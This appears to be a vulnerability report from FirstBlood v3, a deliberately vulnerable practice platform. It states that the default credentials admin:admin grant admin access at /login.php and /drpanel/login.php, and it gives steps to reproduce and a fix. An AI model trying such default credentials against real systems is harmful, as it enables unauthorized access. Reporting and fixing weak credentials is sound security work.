FirstBlood-#1154Default credentials admin:admin work on login.php
This issue was discovered on FirstBlood v3

On 2022-12-08, 0xblackbird Level 5 reported:

Summary: Hi mate!

I hope you're doing well today!

I found out that the following default credentials work after Ayush1098 pointed me in the right direction ;)!

Possible cause:

It is very likely that any of the admins forgot to change the default credentials and left them untouched.

Impact: I was able to login as an unauthorized user and get access to features I shouldn't have had access too!

Steps to reproduce:

1) Spin up firstblood v3 if you haven't already 2) Next, visit /login.php 3) Use the following credentials: admin:admin

4) And click on "Secure Login". You'll notice that we've successfully logged in as the admin username


Changing the default password should be sufficient to fully mitigate this issue.

Thanks! Have a nice day! Kind regards, 0xblackbird


Endpoint: /login.php

Parameter: N/A

Payload: admin:admin

FirstBlood ID: 48
Vulnerability Type: Auth issues

The /drpanel/login.php endpoint contains weak credentials which allows users to access the admin panel (admin:admin)